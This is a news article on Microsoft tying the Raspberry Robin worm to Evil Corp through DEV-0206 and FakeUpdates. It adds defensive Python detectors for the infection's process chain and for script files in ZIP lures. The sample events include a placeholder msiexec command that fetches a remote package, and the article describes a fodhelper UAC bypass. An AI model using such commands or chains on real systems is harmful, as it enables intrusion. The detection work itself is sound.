Microsoft Experts Linked Raspberry Robin Malware to Evil Corp

Microsoft has linked the recently discovered Raspberry Robin Windows malware to the notorious Evil Corp operation.

On July 26, 2022, Microsoft researchers discovered that FakeUpdates malware was distributed via Raspberry Robin malware.

Raspberry Robin is a Windows worm discovered by cybersecurity researchers at Red Canary; the malware spreads via removable USB devices.

The malicious code uses Windows Installer to reach domains associated with QNAP and download a malicious DLL. The malware uses TOR exit nodes as a backup C2 infrastructure.

The malware was first spotted in September 2021, when experts observed Raspberry Robin targeting organizations in the technology and manufacturing sectors. Initial access is usually via infected removable drives, often USB devices.

The malware uses cmd.exe to read and execute a file stored on the infected external drive; it then abuses msiexec.exe for external network communication to a rogue domain used as C2, from which it downloads and installs a DLL library file.

Next, msiexec.exe launches a legitimate Windows utility, fodhelper.exe, which in turn executes rundll32.exe to execute a malicious command. Experts pointed out that the processes launched by fodhelper.exe run with elevated administrative privileges without requiring a User Account Control prompt.
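The process chain described above (cmd.exe reading a file from the removable drive, msiexec.exe reaching out to a remote domain, fodhelper.exe spawning rundll32.exe without a UAC prompt) is a good fit for process-creation telemetry such as Sysmon Event ID 1 or EDR process events. The following is an added detection example written for this article; it is not code from Microsoft, Red Canary or the malware itself. The event fields, the sample events and all paths, URLs and DLL names in them are constructed placeholders, and the "non-system drive letter" heuristic for the cmd.exe stage is an assumption, since process logs do not record whether a drive is removable.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal process-creation record (constructed shape, Sysmon-like)."""
    parent_image: str
    image: str
    command_line: str


# Patterns for the three stages the article describes.
URL_RE = re.compile(r"https?://", re.IGNORECASE)
# Assumption: drive letters other than C: approximate "removable drive" here.
NON_SYSTEM_DRIVE_RE = re.compile(r"\b[D-Z]:\\", re.IGNORECASE)
CMD_READ_EXEC_RE = re.compile(r"(^|\s)/r(\s|$)|\btype\b", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> list[str]:
    """Return the Raspberry Robin stage indicators matched by one event."""
    findings = []
    img, parent, cl = basename(ev.image), basename(ev.parent_image), ev.command_line

    # Stage 1: cmd.exe reading/executing a file that lives on a non-system drive.
    if img == "cmd.exe" and NON_SYSTEM_DRIVE_RE.search(cl) and CMD_READ_EXEC_RE.search(cl):
        findings.append("cmd.exe reading/executing a file from a non-system (possibly removable) drive")

    # Stage 2: Windows Installer fetching a package from a remote URL.
    if img == "msiexec.exe" and URL_RE.search(cl):
        findings.append("msiexec.exe fetching a package from a remote URL")

    # Stage 3: the auto-elevating fodhelper.exe launching rundll32.exe.
    if parent == "fodhelper.exe" and img == "rundll32.exe":
        findings.append("fodhelper.exe spawning rundll32.exe (auto-elevated child, no UAC prompt)")

    return findings


def scan(events: list[ProcEvent]) -> list[tuple[int, str]]:
    """Run classify() over a batch and return (event index, finding) pairs."""
    return [(i, f) for i, ev in enumerate(events) for f in classify(ev)]


# Constructed sample events: four from a simulated infection chain, two benign.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
              r"cmd /R type E:\recovery.lnk"),                       # stage 1
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\msiexec.exe",
              r"msiexec /q /i http://c2.example.invalid/update.msi"),  # stage 2
    ProcEvent(r"C:\Windows\System32\msiexec.exe", r"C:\Windows\System32\fodhelper.exe",
              r"fodhelper.exe"),                                      # no indicator alone
    ProcEvent(r"C:\Windows\System32\fodhelper.exe", r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe C:\Users\Public\placeholder.dll,Entry"), # stage 3
    ProcEvent(r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\msiexec.exe",
              r"msiexec /i C:\Users\alice\Downloads\app.msi"),        # benign local install
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
              r"cmd /c dir D:\backup"),                               # benign, no read/exec
]


if __name__ == "__main__":
    for idx, finding in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {finding}")
```

Each rule on its own is noisy (msiexec.exe with a URL and fodhelper.exe children both occur in legitimate administration), so in practice the value comes from correlating the three stages on one host within a short window; the `scan()` output is the input to that correlation, not the alert itself.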

Now, Microsoft experts have observed threat actor DEV-0206 using the Raspberry Robin worm to deploy a downloader to networks also compromised by malicious actors using Evil Corp’s TTPs.

“On July 26, 2022, Microsoft researchers discovered that FakeUpdates malware was distributed via existing Raspberry Robin infections,” reads the update provided by Microsoft.

“FakeUpdates activity associated with DEV-0206 on affected systems has since led to follow-up actions resembling the pre-ransomware behavior of DEV-0243.”

DEV-0206 is an Access Broker tracked by Microsoft, which uses malvertising campaigns to compromise networks worldwide. The targets are tricked into running a fake browser update or software package to download a ZIP file and double-click it. The ZIP package contains a JavaScript file which, when executed, will initiate the infection process.
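The FakeUpdates delivery described above relies on the victim opening a ZIP that contains a JavaScript file, which Windows runs through the script host on double-click. A mail or download gateway can flag that shape before it reaches a user. Below is an added example written for this article, not code from Microsoft or from the SocGholish operators: it inspects a ZIP in memory and lists members whose extension would be handled by Windows Script Host or mshta. The archives and their member names are constructed samples.

```python
import io
import zipfile

# Extensions that Windows hands to the script host (or mshta) on double-click.
SCRIPT_EXTS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta"}


def script_members(zip_bytes: bytes) -> list[str]:
    """Return archive members whose final extension is a script-host type."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            name = info.filename.rsplit("/", 1)[-1]
            # Use the final extension so "invoice.pdf.js" is still caught.
            ext = "." + name.rsplit(".", 1)[-1].lower() if "." in name else ""
            if ext in SCRIPT_EXTS:
                hits.append(info.filename)
    return hits


def build_zip(members: dict[str, str]) -> bytes:
    """Build a ZIP in memory from {member name: text content} (constructed test data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


# Constructed samples: a fake-update style archive with one script, and a benign one.
FAKE_UPDATE_ZIP = build_zip({"Update.js": "// placeholder script body"})
DOUBLE_EXT_ZIP = build_zip({"docs/invoice.pdf.js": "// placeholder script body"})
BENIGN_ZIP = build_zip({"docs/readme.txt": "hello", "report.pdf": "%PDF-1.4 placeholder"})


if __name__ == "__main__":
    for label, blob in [("fake update", FAKE_UPDATE_ZIP), ("double ext", DOUBLE_EXT_ZIP), ("benign", BENIGN_ZIP)]:
        print(label, "->", script_members(blob) or "no script members")
```

Blocking on extension alone is coarse, but a ZIP whose only member is a script file is the precise shape this lure takes, so gateways commonly quarantine that case outright and send everything else on to content inspection.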

“Once successfully executed, the JavaScript framework, also known as SocGholish, acts as a loader for other malware campaigns that use access purchased from DEV-0206, most commonly Cobalt Strike payloads,” reads the analysis published by Microsoft.

In many cases, the infection process has led to the deployment of custom Cobalt Strike loaders attributed to DEV-0243, which falls under the activity cluster experts track as “EvilCorp.”

Around November 2021, DEV-0243 started deploying the LockBit 2.0 RaaS payload; experts believe the “EvilCorp” group switched to a RaaS payload to avoid attribution.


The discovery made by Microsoft is very interesting because it is the first time that researchers have found evidence that Raspberry Robin operators use an access broker to compromise corporate networks.
